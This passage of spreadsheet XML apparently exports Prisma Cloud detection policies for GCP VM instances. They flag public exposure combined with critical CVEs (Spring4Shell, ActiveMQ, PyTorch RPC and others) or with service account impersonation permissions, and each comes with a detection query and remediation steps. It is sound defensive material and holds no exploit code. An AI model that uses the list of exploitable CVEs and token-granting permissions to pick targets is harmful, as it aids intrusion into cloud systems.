      <c r="K2777" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) risk due to publicly exposed and vulnerable GCP VM instance [Node.js, CVE-2021-21315]</t>
        </is>
      </c>
      <c r="L2777" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2777" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2777" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2777" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2777" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2777" t="inlineStr"/>
      <c r="R2777" t="inlineStr"/>
      <c r="S2777" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2777" t="b">
        <v>0</v>
      </c>
      <c r="U2777" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2777" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2777" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable command injection vulnerability [Node.js, CVE-2021-21315].
Command injection vulnerability is a security flaw allowing an attacker to execute arbitrary commands on the host operating system via a vulnerable application. The fact that the GCP VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Node.js [CVE-2021-21315] vulnerability and public exposure reported for the GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X2777"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CVE-2021-21315
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-21315</t>
        </is>
      </c>
      <c r="Y2777" t="inlineStr"/>
      <c r="Z2777" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-21315'))</t>
        </is>
      </c>
      <c r="AA2777" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2777" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:49</t>
        </is>
      </c>
      <c r="AC2777" t="inlineStr"/>
      <c r="AD2777" t="b">
        <v>1</v>
      </c>
      <c r="AE2777" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2777" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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7" t="inlineStr">
        <is>
          <t>023dae86-1d24-4576-92b2-b92299a009e7</t>
        </is>
      </c>
      <c r="AI2777" t="inlineStr">
        <is>
          <t>4bffd0f2-2b83-4108-9298-c37cf7659592</t>
        </is>
      </c>
      <c r="AJ2777" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2777" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2778">
      <c r="A2778" t="inlineStr"/>
      <c r="B2778" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2778" s="2" t="inlineStr"/>
      <c r="D2778" t="n">
        <v>1155</v>
      </c>
      <c r="E2778" t="n">
        <v>0</v>
      </c>
      <c r="F2778" t="n">
        <v>38</v>
      </c>
      <c r="G2778" t="b">
        <v>1</v>
      </c>
      <c r="H27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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2778" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2778" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable GCP VM instance with service account impersonation permissions</t>
        </is>
      </c>
      <c r="L2778" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2778" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2778" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2778" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2778" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2778" t="inlineStr"/>
      <c r="R2778" t="inlineStr"/>
      <c r="S2778" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2778" t="b">
        <v>0</v>
      </c>
      <c r="U2778" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2778" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2778" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities and having permissions to impersonate a service account.
Publicly exposed vulnerable VM instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The risky privilege escalation IAM permissions on the instance further help the attackers to escalate their privilege and move laterally to perform unauthorized actions in the cloud account.
This policy checks for the following permissions:
'iam.serviceAccounts.getAccessToken', 'iam.serviceAccounts.signBlob', 'iam.serviceAccounts.signJwt', 'iam.serviceAccounts.implicitDelegation', 'iam.serviceAccounts.getOpenIdToken', 'iam.serviceAccounts.actAs'
Immediate attention is required to grant only the least privileges required and remove unwanted permissions assigned to the VM instances. Remediate critical and high vulnerabilities, and restrict public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X277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78" t="inlineStr"/>
      <c r="Z2778" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') AND finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP VM instance with permissions to impersonate a service account') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2778" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2778" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2778" t="inlineStr"/>
      <c r="AD2778" t="b">
        <v>1</v>
      </c>
      <c r="AE2778" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2778" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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8" t="inlineStr">
        <is>
          <t>e402c0f6-f52f-48b1-84fb-bd018acf5dfc</t>
        </is>
      </c>
      <c r="AI2778" t="inlineStr">
        <is>
          <t>5230383f-08e6-4acc-8abb-b1d751831ada</t>
        </is>
      </c>
      <c r="AJ2778" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2778" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2779">
      <c r="A2779" t="inlineStr"/>
      <c r="B2779" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2779" s="2" t="inlineStr"/>
      <c r="D2779" t="n">
        <v>3</v>
      </c>
      <c r="E2779" t="n">
        <v>0</v>
      </c>
      <c r="F2779" t="n">
        <v>0</v>
      </c>
      <c r="G2779" t="b">
        <v>1</v>
      </c>
      <c r="H27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79" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2779" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2779" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) risk due to a publicly exposed GCP VM instance with Spring4Shell vulnerability</t>
        </is>
      </c>
      <c r="L2779" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2779" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2779" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2779" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2779" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2779" t="inlineStr"/>
      <c r="R2779" t="inlineStr"/>
      <c r="S2779" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2779" t="b">
        <v>0</v>
      </c>
      <c r="U2779" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2779" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2779" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance which have Spring4Shell vulnerabilities and are publicly exposed.
The Spring4Shell vulnerability allows attackers to exploit the web server pathway, making all connected applications vulnerable to Remote Code Execution (RCE). Spring4Shell vulnerability is very critical and can compromise the confidentiality, integrity, and availability of data managed by a vulnerable application VM instance. The fact that the VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Spring4Shell vulnerabilities [CVE-2022-22965 and CVE-2022-22963] and public exposure reported for the VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X277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CVE-2022-22963
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-22963
   https://nvd.nist.gov/vuln/detail/CVE-2022-22965</t>
        </is>
      </c>
      <c r="Y2779" t="inlineStr"/>
      <c r="Z2779" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-22963', 'CVE-2022-22965'))</t>
        </is>
      </c>
      <c r="AA2779" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2779" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2779" t="inlineStr"/>
      <c r="AD2779" t="b">
        <v>1</v>
      </c>
      <c r="AE2779" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2779" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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79" t="inlineStr">
        <is>
          <t>c7ac6356-ca72-4763-acb5-ccfe08003293</t>
        </is>
      </c>
      <c r="AI2779" t="inlineStr">
        <is>
          <t>10da54f2-f578-4a87-b258-15a1280cc85b</t>
        </is>
      </c>
      <c r="AJ2779" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2779" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2780">
      <c r="A2780" t="inlineStr"/>
      <c r="B2780" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2780" s="2" t="inlineStr"/>
      <c r="D2780" t="inlineStr"/>
      <c r="E2780" t="inlineStr"/>
      <c r="F2780" t="inlineStr"/>
      <c r="G2780" t="b">
        <v>1</v>
      </c>
      <c r="H27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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2780" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2780" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable GCP VM instance (Apache ActiveMQ, CVE-2023-46604)</t>
        </is>
      </c>
      <c r="L2780" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2780" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2780" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2780" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2780" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2780" t="inlineStr"/>
      <c r="R2780" t="inlineStr"/>
      <c r="S2780" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2780" t="b">
        <v>0</v>
      </c>
      <c r="U2780" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2780" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2780" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2023-46604).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ActiveMQ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ActiveMQ (CVE-2023-46604) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X278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CVE-2023-46604
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-46604</t>
        </is>
      </c>
      <c r="Y2780" t="inlineStr"/>
      <c r="Z2780" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-46604'))</t>
        </is>
      </c>
      <c r="AA2780" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2780" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:12</t>
        </is>
      </c>
      <c r="AC2780" t="inlineStr"/>
      <c r="AD2780" t="b">
        <v>1</v>
      </c>
      <c r="AE2780" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2780" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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0" t="inlineStr">
        <is>
          <t>433cf874-29e7-47c4-9565-8d37e3da2d11</t>
        </is>
      </c>
      <c r="AI2780" t="inlineStr">
        <is>
          <t>103620c8-8148-47bc-8603-fcfe8400c0e3</t>
        </is>
      </c>
      <c r="AJ2780" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2780" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2781">
      <c r="A2781" t="inlineStr"/>
      <c r="B2781" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2781" s="2" t="inlineStr"/>
      <c r="D2781" t="inlineStr"/>
      <c r="E2781" t="inlineStr"/>
      <c r="F2781" t="inlineStr"/>
      <c r="G2781" t="b">
        <v>1</v>
      </c>
      <c r="H27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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2781" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2781" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [Nginx PHP-FPM, CVE-2019-11043]</t>
        </is>
      </c>
      <c r="L2781" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2781" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2781" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2781" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2781" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2781" t="inlineStr"/>
      <c r="R2781" t="inlineStr"/>
      <c r="S2781" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2781" t="b">
        <v>0</v>
      </c>
      <c r="U2781" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2781" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2781" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to remote code execution (RCE) with exploits in the wild [Nginx PHP-FPM, CVE-2019-11043]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of Nginx PHP-FPM software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Nginx PHP-FPM [CVE-2019-11043] vulnerability reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X278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CVE-2019-11043
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2019-11043</t>
        </is>
      </c>
      <c r="Y2781" t="inlineStr"/>
      <c r="Z2781" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2019-11043 - Nginx PHP-FPM Remote Code Execution) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2019-11043'))</t>
        </is>
      </c>
      <c r="AA2781" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2781" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:38</t>
        </is>
      </c>
      <c r="AC2781" t="inlineStr"/>
      <c r="AD2781" t="b">
        <v>1</v>
      </c>
      <c r="AE2781" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2781" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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1" t="inlineStr">
        <is>
          <t>f155870d-e014-4a0f-b0b4-e923fed23055</t>
        </is>
      </c>
      <c r="AI2781" t="inlineStr">
        <is>
          <t>8549dc37-a3ec-4ebe-a5a4-99a99faeb3fe</t>
        </is>
      </c>
      <c r="AJ2781" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2781" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2782">
      <c r="A2782" t="inlineStr"/>
      <c r="B2782" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2782" s="2" t="inlineStr"/>
      <c r="D2782" t="inlineStr"/>
      <c r="E2782" t="inlineStr"/>
      <c r="F2782" t="inlineStr"/>
      <c r="G2782" t="b">
        <v>1</v>
      </c>
      <c r="H27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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2782" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2782" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [WebLogic, CVE-2019-2725, CVE-2019-2729]</t>
        </is>
      </c>
      <c r="L2782" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2782" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2782" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2782" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2782" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2782" t="inlineStr"/>
      <c r="R2782" t="inlineStr"/>
      <c r="S2782" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2782" t="b">
        <v>0</v>
      </c>
      <c r="U2782" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2782" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2782" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to remote code execution (RCE) with exploits in the wild [WebLogic, CVE-2019-2725, CVE-2019-2729].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerabilities on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version of WebLogic software installed makes it an easy target for an attacker to exploit these vulnerabilities.
Immediate attention is required to remediate the WebLogic [CVE-2019-2725, CVE-2019-2729] vulnerabilities reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X2782"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CVE-2019-2725
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2019-2725
   https://nvd.nist.gov/vuln/detail/CVE-2019-2729</t>
        </is>
      </c>
      <c r="Y2782" t="inlineStr"/>
      <c r="Z2782" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2019-2725, CVE-2019-2729 - WebLogic) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2019-2725', 'CVE-2019-2729'))</t>
        </is>
      </c>
      <c r="AA2782" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2782" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:39</t>
        </is>
      </c>
      <c r="AC2782" t="inlineStr"/>
      <c r="AD2782" t="b">
        <v>1</v>
      </c>
      <c r="AE2782" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2782" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG27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2" t="inlineStr">
        <is>
          <t>3b88b60e-0294-4fbd-9993-15d6a4c6ca5e</t>
        </is>
      </c>
      <c r="AI2782" t="inlineStr">
        <is>
          <t>45a0d101-b2ab-4622-80a5-bb9c811d949f</t>
        </is>
      </c>
      <c r="AJ2782" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2782" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2783">
      <c r="A2783" t="inlineStr"/>
      <c r="B2783" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2783" s="2" t="inlineStr"/>
      <c r="D2783" t="inlineStr"/>
      <c r="E2783" t="inlineStr"/>
      <c r="F2783" t="inlineStr"/>
      <c r="G2783" t="b">
        <v>1</v>
      </c>
      <c r="H27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83" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2783" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2783" t="inlineStr">
        <is>
          <t>Command Injection risk due to publicly exposed GCP VM instance with PyTorch vulnerability (Python, CVE-2024-5480)</t>
        </is>
      </c>
      <c r="L2783" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2783" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2783" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2783" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2783" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2783" t="inlineStr"/>
      <c r="R2783" t="inlineStr"/>
      <c r="S2783" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2783" t="b">
        <v>0</v>
      </c>
      <c r="U2783" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2783" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2783" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable Command injection PyTorch Python vulnerability (CVE-2024-5480).
CVE-2024-5480 is a critical vulnerability in PyTorch's torch.distributed.rpc framework affecting versions before 2.2.2. The vulnerability stems from improper verification of functions called during RPC operations. The flaw occurs when a worker node sends a PythonUDF (User Defined Function) to the master node, which executes it without proper validation.
Successful exploitation of the CVE-2024-5480 vulnerability on the publicly exposed GCP VM instance would allow an attacker to execute arbitrary code and compromise master nodes initiating distributed training, potentially resulting in the theft of sensitive AI-related data. This could lead to monetary loss, damage to reputation, and other compliance risks for the organization.
Immediate attention is required to remediate the PyTorch (CVE-2024-5480) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X2783" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict Internet exposure of reported VM instance based on your business requirement by modifying VPC firewall rules to the trusted IP address,
To modify VPC firewall rules,
1. Login to GCP Console
2. Go to 'VM instance'
3. Identify the VM instance that you want to restrict access to Internet
4. Update VPC firewall rule that allow Internet access (0.0.0.0/0)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VPC firewall group rules, make sure that you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.
[VULNERABILITY]
To patch or update the vulnerable software refer to https://nvd.nist.gov/vuln/detail/CVE-2024-5480</t>
        </is>
      </c>
      <c r="Y2783" t="inlineStr"/>
      <c r="Z2783" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-5480'))</t>
        </is>
      </c>
      <c r="AA2783" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2783" t="inlineStr">
        <is>
          <t>2024-08-02 06:55:42</t>
        </is>
      </c>
      <c r="AC2783" t="inlineStr"/>
      <c r="AD2783" t="b">
        <v>1</v>
      </c>
      <c r="AE2783" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2783" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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83" t="inlineStr">
        <is>
          <t>200b4b44-4783-4772-8ae1-6f21ca6d86d4</t>
        </is>
      </c>
      <c r="AI2783" t="inlineStr">
        <is>
          <t>ec554f26-c5f3-47c0-bdda-fce09ff23ecd</t>
        </is>
      </c>
      <c r="AJ2783" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2783" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2784">
      <c r="A2784" t="inlineStr"/>
      <c r="B2784" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2784" s="2" t="inlineStr"/>
      <c r="D2784" t="n">
        <v>5</v>
      </c>
      <c r="E2784" t="n">
        <v>0</v>
      </c>
      <c r="F2784" t="n">
        <v>0</v>
      </c>
      <c r="G2784" t="b">
        <v>1</v>
      </c>
      <c r="H27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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2784" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2784" t="inlineStr">
        <is>
          <t>HTTP request smuggling risk due to publicly exposed and vulnerable GCP VM instance [HAProxy, CVE-2023-25725]</t>
        </is>
      </c>
      <c r="L2784" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2784" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2784" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2784" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2784" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2784" t="inlineStr"/>
      <c r="R2784" t="inlineStr"/>
      <c r="S2784" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2784" t="b">
        <v>0</v>
      </c>
      <c r="U2784" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2784" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2784" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable HTTP request smuggling vulnerability [CVE-2023-25725].
HTTP request smuggling vulnerability can be leveraged by attackers to manipulate or bypass security mechanisms, potentially leading to unauthorized access, data leakage, or other security breaches. The fact that the GCP VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the HAProxy [CVE-2023-25725] vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X2784"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CVE-2023-25725
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-25725</t>
        </is>
      </c>
      <c r="Y2784" t="inlineStr"/>
      <c r="Z2784" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-25725'))</t>
        </is>
      </c>
      <c r="AA2784" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2784" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2784" t="inlineStr"/>
      <c r="AD2784" t="b">
        <v>1</v>
      </c>
      <c r="AE2784" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2784" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG27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4" t="inlineStr">
        <is>
          <t>7f00830e-3f3b-4ed1-baac-2adad7b89b30</t>
        </is>
      </c>
      <c r="AI2784" t="inlineStr">
        <is>
          <t>925a9bc0-51ba-49b4-ba53-6dd96e28de66</t>
        </is>
      </c>
